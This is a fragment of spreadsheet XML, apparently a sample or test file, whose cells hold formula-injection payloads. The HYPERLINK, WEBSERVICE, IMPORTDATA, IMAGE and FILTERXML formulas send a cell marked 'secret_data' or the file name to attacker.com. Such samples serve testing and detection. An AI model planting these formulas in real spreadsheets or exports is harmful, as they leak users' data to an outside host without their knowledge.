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f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secret_data</t>
        </is>
      </c>
      <c r="B1">
        <f>HYPERLINK("http://attacker.com/?d="&amp;A1,"click me")</f>
        <v/>
      </c>
    </row>
    <row r="2">
      <c r="A2">
        <f>WEBSERVICE("http://attacker.com/?hostname="&amp;CELL("filename",A1))</f>
        <v/>
      </c>
    </row>
    <row r="3">
      <c r="A3">
        <f>IMPORTDATA("http://attacker.com/?x="&amp;A1)</f>
        <v/>
      </c>
    </row>
    <row r="4">
      <c r="A4">
        <f>IMAGE("http://attacker.com/track.gif?id="&amp;A1)</f>
        <v/>
      </c>
    </row>
    <row r="5">
      <c r="A5">
        <f>FILTERXML(WEBSERVICE("http://attacker.com/"),"//a")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2026-02-24T19:11:32Z</dcterms:created>
  <dcterms:modified xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2026-02-24T19:11:32Z</dcterms:modified>
</cp:coreProperties>
</file>